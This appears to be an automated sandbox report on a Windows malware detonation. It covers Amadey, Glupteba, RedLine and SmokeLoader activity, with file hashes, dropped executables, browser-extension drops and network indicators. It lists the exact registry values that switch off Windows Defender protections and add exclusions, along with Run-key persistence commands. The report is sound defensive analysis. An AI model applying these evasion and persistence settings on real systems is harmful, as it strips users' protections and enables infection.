SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\s5818u5m.default-release\prefs.js

MD5 0c8caf8f5dc176dd69afd3ab098b6cba
SHA1 052af7bd6ab907ba9a007000664d02e40e2005e5
SHA256 138405737b7ec2e9af7a3c5f12a895fc4a60610025973315d75ebe2a17ba87b5
SHA512 0bec539a3148c36ce933692bd290d750b2ab44e4f401af86bf586bc73abc7fb3d08073624b8943c3f080b3841c2df10d229a3904a6685d7602346048802daf99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c9d9158043ef353ae3c6d208d29b9e77
SHA1 f3fc945eb7a0cf484d7456a5dae1bdc80e8cb2e7
SHA256 3ef2a3a7ccc05914a4bc88649d916395becfef5d9f036537e530edb593119753
SHA512 bbdd40435450a526ffbec0e4fc939450e6d8dfb64ac75d754c84e3e65fa15264c4f6fb5d6de2828a9aa3f3ec957c2ad950e1343fa233c6ff341363c7a9441a29

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-25 04:51

Reported

2023-10-25 04:58

Platform

win10-20231023-en

Max time kernel

300s

Max time network

305s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3567.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\31D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3303.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\34AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3652.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F8F7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FBD7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FD10.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS2C5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\563E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3567.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\FBD7.exe'\"" C:\Users\Admin\AppData\Local\Temp\FBD7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\31D9.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\reg.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\pLLAUwk.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\GpfcWYRxKqUn\augjBeP.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\MyBurn\is-9J2ED.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-D3M8Q.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-O12SC.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\vtqvHoN.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\MyBurn\is-47A9M.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files (x86)\DlbZONUGhjVU2\BjiurileBFhpy.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-N4CS0.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\oVhJPNkDU\ooIpBXG.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PorJuvb.dll C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-D37O4.tmp C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\FbwfCRD.exe N/A
